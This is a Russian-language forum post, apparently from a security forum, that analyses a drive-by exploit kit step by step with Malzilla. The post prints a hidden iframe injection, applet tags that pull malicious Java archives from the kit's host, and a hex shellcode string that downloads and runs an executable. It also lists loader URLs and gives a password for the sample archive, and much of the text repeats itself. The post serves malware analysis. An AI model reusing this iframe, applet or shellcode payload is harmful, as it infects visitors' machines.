Наткнулся на мдл-е на такой вот скрипт:
91.188.59.21/eengine.js с надписью iframe и решыл проанализировать его содержымое..
Копируем его в malzilla=>decoder жмем run script и соглашаемся на замену евал
полученный результат заменяем вместо eval(unescape("бла-бла-бла"))
Жмем run script и получаем ифрейм
Ифрейм ведет на пак с неизвестным названием.Сразу скажу что ничего интересного я не увидел, а взялся что-то написать о данном экземпляре из-за того, что в одно время он просто кишил в блек-листах..
Далее Download => Get(hххp://0n0.in/x/?src=ftpframer&id=ftpframe) сохраним в (index_ie6.txt)
Жмем send all scripts to decoder и run script
Далее смотрим на eval()results (index_ie6_decoded.txt)
видим код в котором сначала идет проверка плагинов,затем пдф сплоит,который качаем по ссылке
Посмотрим подробнее:
получаем 2 файла (pdf2.pdf.2decoded.txt,pdf2.pdf.1decoded.txt)
В первом JS, кидаем его в малзиллу, смотрим eval results()
util_printf,collab_email,collab_geticon - названия функций говорят сами за себя..
Далее идут два Java сплоита
jar1() - использует уязвимость в JRE
jar2() - использует уязвимость getSoundBank
ну и мдак(куда же без него),ссылка на лоадер
снепшот QagiqafuqoXalihazed(),ссылка на лоадер
Также интерестно то, что по адресу hххp://0n0.in/x/stat.php (stat.txt) находиться статистика, без какой-либо авторизации...По реффериалам(со статы) были найдены ифреймы которые ведут все на ту же самую связку только на разных доменах (iframe_decoded.txt)
Все файлы можна скачать тут:
91.188.59.21/eengine.js с надписью iframe и решыл проанализировать его содержымое..
Копируем его в malzilla=>decoder жмем run script и соглашаемся на замену евал
полученный результат заменяем вместо eval(unescape("бла-бла-бла"))
Жмем run script и получаем ифрейм
Код:
<iframe src="hххp://0n0.in/x/?src=ftpframer&id=ftpframe" width="1" height="1" scrolling="no" frameborder="0"></iframe>
Ифрейм ведет на пак с неизвестным названием.Сразу скажу что ничего интересного я не увидел, а взялся что-то написать о данном экземпляре из-за того, что в одно время он просто кишил в блек-листах..
Далее Download => Get(hххp://0n0.in/x/?src=ftpframer&id=ftpframe) сохраним в (index_ie6.txt)
Жмем send all scripts to decoder и run script
Далее смотрим на eval()results (index_ie6_decoded.txt)
видим код в котором сначала идет проверка плагинов,затем пдф сплоит,который качаем по ссылке
Код:
hххp://0n0.in/x/pdf3.php?src=ftpframer&id=ftpframe
Код:
pdfdigger.bat -f pdf2.pdfВ первом JS, кидаем его в малзиллу, смотрим eval results()
util_printf,collab_email,collab_geticon - названия функций говорят сами за себя..
Далее идут два Java сплоита
jar1() - использует уязвимость в JRE
Код:
<applet code="myf.y.AppletX.class" archive="hххp://0n0.in/x/jar.jar" width="1" height="1"><param name="data" value="hххp://0n0.in/x/exe.php?src=ftpframer&id=ftpframe&x=jas"><param name="cc" value="1"></applet>
Код:
<applet width='1' height='1' code='AppletX' archive='http://0n0.in/x/midi.jar'><param name='sc' value='505351525657559CE8000000005D83ED0D31C064034030780C8B400C8B701CAD8B4008EB098B40348D407C8B403C5657BE5E01000001EEBF4E01000001EFE8D60100005F5E89EA81C25E010000526880000000FF954E01000089EA81C25E01000031F601C28A9C356302000080FB007406881C3246EBEEC604320089EA81C24502000052FF955201000089EA81C2500200005250FF95560100006A006A0089EA81C25E0100005289EA81C278020000526A00FFD06A0589EA81C25E01000052FF955A01000089EA81C25E010000526880000000FF954E01000089EA81C25E01000031F601C28A9C356E02000080FB007406881C3246EBEEC604320089EA81C24502000052FF955201000089EA81C2500200005250FF95560100006A006A0089EA81C25E0100005289EA81C2A6020000526A00FFD06A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C30000000000000000000000000000000047657454656D705061746841004C6F61644C696272617279410047657450726F63416464726573730057696E4578656300BB89F289F730C0AE75FD29F789F931C0BE3C00000003B51B02000066AD03851B0200008B707883C61C03B51B0200008DBD1F020000AD03851B020000ABAD03851B02000050ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF3A65974045E43EBE95E93D1E003852702000031F69666ADC1E00203851F02000089C6AD03851B020000C3B100000000000000000000000000000000089851B0200005657E858FFFFFF5F5EAB01CE803EBB7402EBEDC355524C4D4F4E2E444C4C0055524C446F776E6C6F6164546F46696C6541007064667570642E6578650063726173682E70687000687474703A2F2F767673656E2E696E2F782F6578652E7068703F783D6D696469267372633D626F73732669643D626F6D62610090'><param name='np' value='90909090'></applet>
Код:
hххp://0n0.in/x/exe.php?src=ftpframer&id=ftpframe&x=mdac
Код:
hххp://0n0.in/x/exe.php?src=ftpframer&id=ftpframe&x=snap
Все файлы можна скачать тут:
скачать
pass:=damagelab=
pass:=damagelab=
)
